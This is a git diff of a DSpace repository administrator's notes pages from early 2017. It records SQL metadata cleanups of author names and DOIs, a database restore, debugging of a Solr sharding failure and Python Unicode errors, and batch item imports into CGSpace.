    dspace=# update metadatavalue set authority='5ff35043-942e-4d0a-b377-4daed6e3c1a3', confidence=600, text_value='Duncan, Alan' where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*Duncan,? A.*';
     UPDATE 204
    -dspace=# update metadatavalue set authority='46804b53-ea30-4a85-9ccf-b79a35816fa9', confidence=600, text_value='Mekonnen, Kindu' where resource_type_id=2 and metadata_field_id=3 and text_value like '%Mekonnen, K%';
    +dspace=# update metadatavalue set authority='46804b53-ea30-4a85-9ccf-b79a35816fa9', confidence=600, text_value='Mekonnen, Kindu' where resource_type_id=2 and metadata_field_id=3 and text_value like '%Mekonnen, K%';
     UPDATE 89
    -dspace=# update metadatavalue set authority='f840da02-26e7-4a74-b7ba-3e2b723f3684', confidence=600, text_value='Lukuyu, Ben A.' where resource_type_id=2 and metadata_field_id=3 and text_value like '%Lukuyu, B%';
    +dspace=# update metadatavalue set authority='f840da02-26e7-4a74-b7ba-3e2b723f3684', confidence=600, text_value='Lukuyu, Ben A.' where resource_type_id=2 and metadata_field_id=3 and text_value like '%Lukuyu, B%';
     UPDATE 140
     
    • Generated a new UUID for Ben using uuidgen | tr [A-Z] [a-z] as the one in Solr had his ORCID but the name format was incorrect
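For reference, the same kind of lowercase identifier can be produced from Python's standard library instead of `uuidgen | tr [A-Z] [a-z]`. This is a minimal sketch; the variable name `new_authority_id` is only illustrative.

```python
import uuid

# str() of a UUID object is already lowercase hex with hyphens
new_authority_id = str(uuid.uuid4())
print(new_authority_id)
```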
    • @@ -716,9 +716,9 @@ OCSP Response Data:
     # su - postgres
     $ dropdb cgspace
     $ createdb -O cgspace --encoding=UNICODE cgspace
    -$ psql cgspace -c 'alter user cgspace createuser;'
    +$ psql cgspace -c 'alter user cgspace createuser;'
     $ pg_restore -O -U cgspace -d cgspace -W -h localhost /home/backup/postgres/cgspace_2016-12-18.backup
    -$ psql cgspace -c 'alter user cgspace nocreateuser;'
    +$ psql cgspace -c 'alter user cgspace nocreateuser;'
     $ psql -U cgspace -f ~tomcat7/src/git/DSpace/dspace/etc/postgres/update-sequences.sql cgspace -h localhost
     $ vacuumdb cgspace
     $ psql cgspace
    diff --git a/docs/2017-01/index.html b/docs/2017-01/index.html
    index 2071e3034..6175fc5f7 100644
    --- a/docs/2017-01/index.html
    +++ b/docs/2017-01/index.html
    @@ -28,7 +28,7 @@ I checked to see if the Solr sharding task that is supposed to run on January 1s
     I tested on DSpace Test as well and it doesn’t work there either
     I asked on the dspace-tech mailing list because it seems to be broken, and actually now I’m not sure if we’ve ever had the sharding task run successfully over all these years
     "/>
    -
    +
    @@ -124,7 +124,7 @@ I asked on the dspace-tech mailing list because it seems to be broken, and actua
      • I tried to shard my local dev instance and it fails the same way:
      -
      $ JAVA_OPTS="-Xms768m -Xmx768m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace stats-util -s
      +
      $ JAVA_OPTS="-Xms768m -Xmx768m -Dfile.encoding=UTF-8" ~/dspace/bin/dspace stats-util -s
       Moving: 9318 into core statistics-2016
       Exception: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2016
       org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2016
      @@ -179,15 +179,15 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
       
    • Despite failing instantly, a statistics-2016 directory was created, but it only has a data dir (no conf)
    • The Tomcat access logs show more:
    -
    127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/statistics/select?q=type%3A2+AND+id%3A1&wt=javabin&version=2 HTTP/1.1" 200 107
    -127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/statistics/select?q=*%3A*&rows=0&facet=true&facet.range=time&facet.range.start=NOW%2FYEAR-17YEARS&facet.range.end=NOW%2FYEAR%2B0YEARS&facet.range.gap=%2B1YEAR&facet.mincount=1&wt=javabin&version=2 HTTP/1.1" 200 423
    -127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/admin/cores?action=STATUS&core=statistics-2016&indexInfo=true&wt=javabin&version=2 HTTP/1.1" 200 77
    -127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/admin/cores?action=CREATE&name=statistics-2016&instanceDir=statistics&dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&wt=javabin&version=2 HTTP/1.1" 200 63
    -127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] "GET /solr/statistics/select?csv.mv.separator=%7C&q=*%3A*&fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&rows=10000&wt=csv HTTP/1.1" 200 4359517
    -127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] "GET /solr/statistics/admin/luke?show=schema&wt=javabin&version=2 HTTP/1.1" 200 16248
    -127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] "POST /solr//statistics-2016/update/csv?commit=true&softCommit=false&waitSearcher=true&f.previousWorkflowStep.split=true&f.previousWorkflowStep.separator=%7C&f.previousWorkflowStep.encapsulator=%22&f.actingGroupId.split=true&f.actingGroupId.separator=%7C&f.actingGroupId.encapsulator=%22&f.containerCommunity.split=true&f.containerCommunity.separator=%7C&f.containerCommunity.encapsulator=%22&f.range.split=true&f.range.separator=%7C&f.range.encapsulator=%22&f.containerItem.split=true&f.containerItem.separator=%7C&f.containerItem.encapsulator=%22&f.p_communities_map.split=true&f.p_communities_map.separator=%7C&f.p_communities_map.encapsulator=%22&f.ngram_query_search.split=true&f.ngram_query_search.separator=%7C&f.ngram_query_search.encapsulator=%22&f.containerBitstream.split=true&f.containerBitstream.separator=%7C&f.containerBitstream.encapsulator=%22&f.owningItem.split=true&f.owningItem.separator=%7C&f.owningItem.encapsulator=%22&f.actingGroupParentId.split=true&f.actingGroupParentId.separator=%7C&f.actingGroupParentId.encapsulator=%22&f.text.split=true&f.text.separator=%7C&f.text.encapsulator=%22&f.simple_query_search.split=true&f.simple_query_search.separator=%7C&f.simple_query_search.encapsulator=%22&f.owningComm.split=true&f.owningComm.separator=%7C&f.owningComm.encapsulator=%22&f.owner.split=true&f.owner.separator=%7C&f.owner.encapsulator=%22&f.filterquery.split=true&f.filterquery.separator=%7C&f.filterquery.encapsulator=%22&f.p_group_map.split=true&f.p_group_map.separator=%7C&f.p_group_map.encapsulator=%22&f.actorMemberGroupId.split=true&f.actorMemberGroupId.separator=%7C&f.actorMemberGroupId.encapsulator=%22&f.bitstreamId.split=true&f.bitstreamId.separator=%7C&f.bitstreamId.encapsulator=%22&f.group_name.split=true&f.group_name.separator=%7C&f.group_name.encapsulator=%22&f.p_communities_name.split=true&f.p_communities_name.separator=%7C&f.p_communities_name.encapsulator=%22&f.query.split=true&f.query.separator=%7C&
f.query.encapsulator=%22&f.workflowStep.split=true&f.workflowStep.separator=%7C&f.workflowStep.encapsulator=%22&f.containerCollection.split=true&f.containerCollection.separator=%7C&f.containerCollection.encapsulator=%22&f.complete_query_search.split=true&f.complete_query_search.separator=%7C&f.complete_query_search.encapsulator=%22&f.p_communities_id.split=true&f.p_communities_id.separator=%7C&f.p_communities_id.encapsulator=%22&f.rangeDescription.split=true&f.rangeDescription.separator=%7C&f.rangeDescription.encapsulator=%22&f.group_id.split=true&f.group_id.separator=%7C&f.group_id.encapsulator=%22&f.bundleName.split=true&f.bundleName.separator=%7C&f.bundleName.encapsulator=%22&f.ngram_simplequery_search.split=true&f.ngram_simplequery_search.separator=%7C&f.ngram_simplequery_search.encapsulator=%22&f.group_map.split=true&f.group_map.separator=%7C&f.group_map.encapsulator=%22&f.owningColl.split=true&f.owningColl.separator=%7C&f.owningColl.encapsulator=%22&f.p_group_id.split=true&f.p_group_id.separator=%7C&f.p_group_id.encapsulator=%22&f.p_group_name.split=true&f.p_group_name.separator=%7C&f.p_group_name.encapsulator=%22&wt=javabin&version=2 HTTP/1.1" 409 156
    -127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] "POST /solr/datatables/update?wt=javabin&version=2 HTTP/1.1" 200 41
    -127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] "POST /solr/datatables/update HTTP/1.1" 200 40
    +
    127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/statistics/select?q=type%3A2+AND+id%3A1&wt=javabin&version=2 HTTP/1.1" 200 107
    +127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/statistics/select?q=*%3A*&rows=0&facet=true&facet.range=time&facet.range.start=NOW%2FYEAR-17YEARS&facet.range.end=NOW%2FYEAR%2B0YEARS&facet.range.gap=%2B1YEAR&facet.mincount=1&wt=javabin&version=2 HTTP/1.1" 200 423
    +127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/admin/cores?action=STATUS&core=statistics-2016&indexInfo=true&wt=javabin&version=2 HTTP/1.1" 200 77
    +127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] "GET /solr/admin/cores?action=CREATE&name=statistics-2016&instanceDir=statistics&dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&wt=javabin&version=2 HTTP/1.1" 200 63
    +127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] "GET /solr/statistics/select?csv.mv.separator=%7C&q=*%3A*&fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&rows=10000&wt=csv HTTP/1.1" 200 4359517
    +127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] "GET /solr/statistics/admin/luke?show=schema&wt=javabin&version=2 HTTP/1.1" 200 16248
    +127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] "POST /solr//statistics-2016/update/csv?commit=true&softCommit=false&waitSearcher=true&f.previousWorkflowStep.split=true&f.previousWorkflowStep.separator=%7C&f.previousWorkflowStep.encapsulator=%22&f.actingGroupId.split=true&f.actingGroupId.separator=%7C&f.actingGroupId.encapsulator=%22&f.containerCommunity.split=true&f.containerCommunity.separator=%7C&f.containerCommunity.encapsulator=%22&f.range.split=true&f.range.separator=%7C&f.range.encapsulator=%22&f.containerItem.split=true&f.containerItem.separator=%7C&f.containerItem.encapsulator=%22&f.p_communities_map.split=true&f.p_communities_map.separator=%7C&f.p_communities_map.encapsulator=%22&f.ngram_query_search.split=true&f.ngram_query_search.separator=%7C&f.ngram_query_search.encapsulator=%22&f.containerBitstream.split=true&f.containerBitstream.separator=%7C&f.containerBitstream.encapsulator=%22&f.owningItem.split=true&f.owningItem.separator=%7C&f.owningItem.encapsulator=%22&f.actingGroupParentId.split=true&f.actingGroupParentId.separator=%7C&f.actingGroupParentId.encapsulator=%22&f.text.split=true&f.text.separator=%7C&f.text.encapsulator=%22&f.simple_query_search.split=true&f.simple_query_search.separator=%7C&f.simple_query_search.encapsulator=%22&f.owningComm.split=true&f.owningComm.separator=%7C&f.owningComm.encapsulator=%22&f.owner.split=true&f.owner.separator=%7C&f.owner.encapsulator=%22&f.filterquery.split=true&f.filterquery.separator=%7C&f.filterquery.encapsulator=%22&f.p_group_map.split=true&f.p_group_map.separator=%7C&f.p_group_map.encapsulator=%22&f.actorMemberGroupId.split=true&f.actorMemberGroupId.separator=%7C&f.actorMemberGroupId.encapsulator=%22&f.bitstreamId.split=true&f.bitstreamId.separator=%7C&f.bitstreamId.encapsulator=%22&f.group_name.split=true&f.group_name.separator=%7C&f.group_name.encapsulator=%22&f.p_communities_name.split=true&f.p_communities_name.separator=%7C&f.p_communities_name.encapsulator=%22&f.query.split=true&f.query.separator=%7C&
f.query.encapsulator=%22&f.workflowStep.split=true&f.workflowStep.separator=%7C&f.workflowStep.encapsulator=%22&f.containerCollection.split=true&f.containerCollection.separator=%7C&f.containerCollection.encapsulator=%22&f.complete_query_search.split=true&f.complete_query_search.separator=%7C&f.complete_query_search.encapsulator=%22&f.p_communities_id.split=true&f.p_communities_id.separator=%7C&f.p_communities_id.encapsulator=%22&f.rangeDescription.split=true&f.rangeDescription.separator=%7C&f.rangeDescription.encapsulator=%22&f.group_id.split=true&f.group_id.separator=%7C&f.group_id.encapsulator=%22&f.bundleName.split=true&f.bundleName.separator=%7C&f.bundleName.encapsulator=%22&f.ngram_simplequery_search.split=true&f.ngram_simplequery_search.separator=%7C&f.ngram_simplequery_search.encapsulator=%22&f.group_map.split=true&f.group_map.separator=%7C&f.group_map.encapsulator=%22&f.owningColl.split=true&f.owningColl.separator=%7C&f.owningColl.encapsulator=%22&f.p_group_id.split=true&f.p_group_id.separator=%7C&f.p_group_id.encapsulator=%22&f.p_group_name.split=true&f.p_group_name.separator=%7C&f.p_group_name.encapsulator=%22&wt=javabin&version=2 HTTP/1.1" 409 156
    +127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] "POST /solr/datatables/update?wt=javabin&version=2 HTTP/1.1" 200 41
    +127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] "POST /solr/datatables/update HTTP/1.1" 200 40
     
    • Very interesting… it creates the core and then fails somehow
    @@ -208,11 +208,11 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
  • I found an old post on the mailing list discussing a similar issue, and listing some SQL commands that might help
  • For example, this shows 186 mappings for the item, the first three of which are real:
  • -
    dspace=#  select * from collection2item where item_id = '80596';
    +
    dspace=#  select * from collection2item where item_id = '80596';
     
    • Then I deleted the others:
    -
    dspace=# delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
    +
    dspace=# delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
     
    • And in the item view it now shows the correct mappings
    • I will have to ask the DSpace people if this is a valid approach
    • @@ -224,19 +224,19 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
    • Error in fix-metadata-values.py when it tries to print the value for Entwicklung & Ländlicher Raum:
    Traceback (most recent call last):
    -  File "./fix-metadata-values.py", line 80, in <module>
    -    print("Fixing {} occurences of: {}".format(records_to_fix, record[0]))
    -UnicodeEncodeError: 'ascii' codec can't encode character u'\xe4' in position 15: ordinal not in range(128)
    +  File "./fix-metadata-values.py", line 80, in <module>
    +    print("Fixing {} occurences of: {}".format(records_to_fix, record[0]))
    +UnicodeEncodeError: 'ascii' codec can't encode character u'\xe4' in position 15: ordinal not in range(128)
     
    • Seems we need to encode as UTF-8 before printing to screen, ie:
    -
    print("Fixing {} occurences of: {}".format(records_to_fix, record[0].encode('utf-8')))
    +
    print("Fixing {} occurences of: {}".format(records_to_fix, record[0].encode('utf-8')))
     
    • See: http://stackoverflow.com/a/36427358/487333
    • I’m actually not sure if we need to encode() the strings to UTF-8 before writing them to the database… I’ve never had this issue before
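The failure in the traceback can be reproduced in isolation. The sketch below is written for Python 3, whereas the script above ran under Python 2, so it only illustrates why the ASCII codec rejects the string and is not a drop-in fix for the script. The variable names are illustrative.

```python
# The journal title from the traceback, with the umlaut written as an escape
title = "Entwicklung & L\u00e4ndlicher Raum"

failing_index = None
failing_char = None
try:
    # ASCII cannot represent U+00E4, which is what the traceback reports
    title.encode("ascii")
except UnicodeEncodeError as error:
    failing_index = error.start
    failing_char = title[failing_index]

# UTF-8 can represent every character in the title
utf8_bytes = title.encode("utf-8")

print(failing_index, repr(failing_char), len(utf8_bytes))
```

The reported index matches the "position 15" in the traceback. In Python 3 `print()` accepts the string directly, so calling `encode('utf-8')` before printing would show a bytes literal instead.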
    • Now back to cleaning up some journal titles so we can make the controlled vocabulary:
    -
    $ ./fix-metadata-values.py -i /tmp/fix-27-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/fix-27-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'fuuu'
     
    • Now get the top 500 journal titles:
    @@ -255,9 +255,9 @@ UnicodeEncodeError: 'ascii' codec can't encode character u'\xe4' in position 15:
  • Fix the two items Maria found with duplicate mappings with this script:
  • /* 184 incorrect mappings: https://cgspace.cgiar.org/handle/10568/78596 */
    -delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
    +delete from collection2item where item_id = '80596' and id not in (90792, 90806, 90807);
     /* 1 incorrect mapping: https://cgspace.cgiar.org/handle/10568/78658 */
    -delete from collection2item where id = '91082';
    +delete from collection2item where id = '91082';
     

    2017-01-17

    • Helping clean up some file names in the 232 CIAT records that Sisay worked on last week
    • @@ -266,15 +266,15 @@ delete from collection2item where id = '91082';
    • And the file names don’t really matter either, as long as the SAF Builder tool can read them—after that DSpace renames them with a hash in the assetstore
    • Seems like the only ones I should replace are the ' apostrophe characters, as %27:
    -
    value.replace("'",'%27')
    +
    value.replace("'",'%27')
     
    • Add the item’s Type to the filename column as a hint to SAF Builder so it can set a more useful description field:
    -
    value + "__description:" + cells["dc.type"].value
    +
    value + "__description:" + cells["dc.type"].value
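
The two OpenRefine expressions above can be mirrored in Python to check the resulting filename column before building the archive. This is a sketch under assumptions: `saf_filename` is a hypothetical helper that combines both steps, and the sample file name and type are made up.

```python
def saf_filename(filename, item_type):
    """Escape apostrophes and append the item type as a description hint."""
    # Same as value.replace("'", '%27') in OpenRefine
    escaped = filename.replace("'", "%27")
    # Same as value + "__description:" + cells["dc.type"].value
    return escaped + "__description:" + item_type


example = saf_filename("farmer's guide.pdf", "Report")
print(example)
```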
     
    • Test importing of the new CIAT records (actually there are 232, not 234):
    -
    $ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/dspacetest.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/79042 --source /home/aorth/CIAT_234/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &> /tmp/ciat.log
    +
    $ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/dspacetest.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/79042 --source /home/aorth/CIAT_234/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &> /tmp/ciat.log
     
    • Many of the PDFs are 20, 30, 40, 50+ MB, which makes a total of 4GB
    • These are scanned from paper and likely have no compression, so we should test whether these compression techniques help without compromising the quality too much:
    • @@ -289,7 +289,7 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
    • In testing a random sample of CIAT’s PDFs for compressibility, it looks like all of these methods generally increase the file size so we will just import them as they are
    • Import 232 CIAT records into CGSpace:
    -
    $ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/68704 --source /home/aorth/CIAT_232/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &> /tmp/ciat.log
    +
    $ JAVA_OPTS="-Xmx512m -Dfile.encoding=UTF-8" /home/cgspace.cgiar.org/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/68704 --source /home/aorth/CIAT_232/SimpleArchiveFormat/ --mapfile=/tmp/ciat.map &> /tmp/ciat.log
     

    2017-01-22

    • Looking at some records that Sisay is having problems importing into DSpace Test (seems to be because of copious whitespace return characters from Excel’s CSV exporter)
    • @@ -300,7 +300,7 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
    • I merged Atmire’s pull request into the development branch so they can deploy it on DSpace Test
    • Move some old ILRI Program communities to a new subcommunity for former programs (10568/79164):
    -
    $ for community in 10568/171 10568/27868 10568/231 10568/27869 10568/150 10568/230 10568/32724 10568/172; do /home/cgspace.cgiar.org/bin/dspace community-filiator --remove --parent=10568/27866 --child="$community" && /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/79164 --child="$community"; done
    +
    $ for community in 10568/171 10568/27868 10568/231 10568/27869 10568/150 10568/230 10568/32724 10568/172; do /home/cgspace.cgiar.org/bin/dspace community-filiator --remove --parent=10568/27866 --child="$community" && /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/79164 --child="$community"; done
     
    @@ -311,7 +311,7 @@ $ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -
  • Run all updates on DSpace Test and reboot the server
  • Run fixes for Journal titles on CGSpace:
  • -
    $ ./fix-metadata-values.py -i /tmp/fix-49-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'password'
    +
    $ ./fix-metadata-values.py -i /tmp/fix-49-journal-titles.csv -f dc.source -t correct -m 55 -d dspace -u dspace -p 'password'
     
    • Create a new list of the top 500 journal titles from the database:
    diff --git a/docs/2017-02/index.html b/docs/2017-02/index.html index 029e3ec5b..4363ce9f8 100644 --- a/docs/2017-02/index.html +++ b/docs/2017-02/index.html @@ -50,7 +50,7 @@ DELETE 1 Create issue on GitHub to track the addition of CCAFS Phase II project tags (#301) Looks like we’ll be using cg.identifier.ccafsprojectpii as the field name "/> - + @@ -140,7 +140,7 @@ Looks like we’ll be using cg.identifier.ccafsprojectpii as the field name
    • An item was mapped twice erroneously again, so I had to remove one of the mappings manually:
    -
    dspace=# select * from collection2item where item_id = '80278';
    +
    dspace=# select * from collection2item where item_id = '80278';
       id   | collection_id | item_id
     -------+---------------+---------
      92551 |           313 |   80278
    @@ -166,7 +166,7 @@ DELETE 1
     
  • The climate risk management one doesn’t exist, so I will have to ask Magdalena if they want me to add it to the input forms
  • Start testing some nearly 500 author corrections that CCAFS sent me:
  • -
    $ ./fix-metadata-values.py -i /tmp/CCAFS-Authors-Feb-7.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
    +
    $ ./fix-metadata-values.py -i /tmp/CCAFS-Authors-Feb-7.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
     

    2017-02-09

    • More work on CCAFS Phase II stuff
    • @@ -219,51 +219,50 @@ DELETE 1
    • And then a SQL command to update existing records:
    -
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'uri');
    +
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, 'http://hdl.handle.net', 'https://hdl.handle.net') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'uri');
     UPDATE 58193
     
    • Seems to work fine!
    • I noticed a few items that have incorrect DOI links (dc.identifier.doi), and after looking in the database I see there are over 100 that are missing the scheme or are just plain wrong:
    -
    dspace=# select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value not like 'http%://%';
    +
    dspace=# select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value not like 'http%://%';
     
    • This will replace any that begin with 10. and change them to https://dx.doi.org/10.:
    -
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^10\..+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like '10.%';
    +
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^10\..+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like '10.%';
     
    • This will get any that begin with doi:10. and change them to https://dx.doi.org/10.x:
    -
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^doi:(10\..+$)', 'https://dx.doi.org/\1') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'doi:10%';
    +
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^doi:(10\..+$)', 'https://dx.doi.org/\1') where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'doi:10%';
     
    • Fix DOIs like dx.doi.org/10. to be https://dx.doi.org/10.:
    -
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org/%';
    +
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org/%';
     
    • Fix DOIs like http//:
    -
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^http//(dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http//%';
    +
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '^http//(dx.doi.org/.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'http//%';
     
    • Fix DOIs like dx.doi.org./:
    -
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org\./.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org./%';
    -
    +
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '(^dx.doi.org\./.+$)', 'https://dx.doi.org/\1') where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value like 'dx.doi.org./%';
     
    • Delete some invalid DOIs:
    -
    dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value in ('DOI','CPWF Mekong','Bulawayo, Zimbabwe','bb');
    +
    dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value in ('DOI','CPWF Mekong','Bulawayo, Zimbabwe','bb');
     
    • Fix some other random outliers:
    -
    dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1016/j.aquaculture.2015.09.003' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:/dx.doi.org/10.1016/j.aquaculture.2015.09.003';
    -dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.5337/2016.200' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'doi: https://dx.doi.org/10.5337/2016.200';
    -dspace=# update metadatavalue set text_value = 'https://dx.doi.org/doi:10.1371/journal.pone.0062898' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Http://dx.doi.org/doi:10.1371/journal.pone.0062898';
    -dspace=# update metadatavalue set text_value = 'https://dx.doi.10.1016/j.cosust.2013.11.012' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:dx.doi.10.1016/j.cosust.2013.11.012';
    -dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1080/03632415.2014.883570' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'org/10.1080/03632415.2014.883570';
    -dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.15446/agron.colomb.v32n3.46052' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Doi: 10.15446/agron.colomb.v32n3.46052';
    +
    dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1016/j.aquaculture.2015.09.003' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:/dx.doi.org/10.1016/j.aquaculture.2015.09.003';
    +dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.5337/2016.200' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'doi: https://dx.doi.org/10.5337/2016.200';
    +dspace=# update metadatavalue set text_value = 'https://dx.doi.org/doi:10.1371/journal.pone.0062898' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Http://dx.doi.org/doi:10.1371/journal.pone.0062898';
    +dspace=# update metadatavalue set text_value = 'https://dx.doi.10.1016/j.cosust.2013.11.012' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'http:dx.doi.10.1016/j.cosust.2013.11.012';
    +dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.1080/03632415.2014.883570' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'org/10.1080/03632415.2014.883570';
    +dspace=# update metadatavalue set text_value = 'https://dx.doi.org/10.15446/agron.colomb.v32n3.46052' where metadata_field_id IN (select metadata_field_id from metadatafieldregistry where element = 'identifier' and qualifier = 'doi') and text_value = 'Doi: 10.15446/agron.colomb.v32n3.46052';
     
    • And do another round of http:// → https:// cleanups:
    -
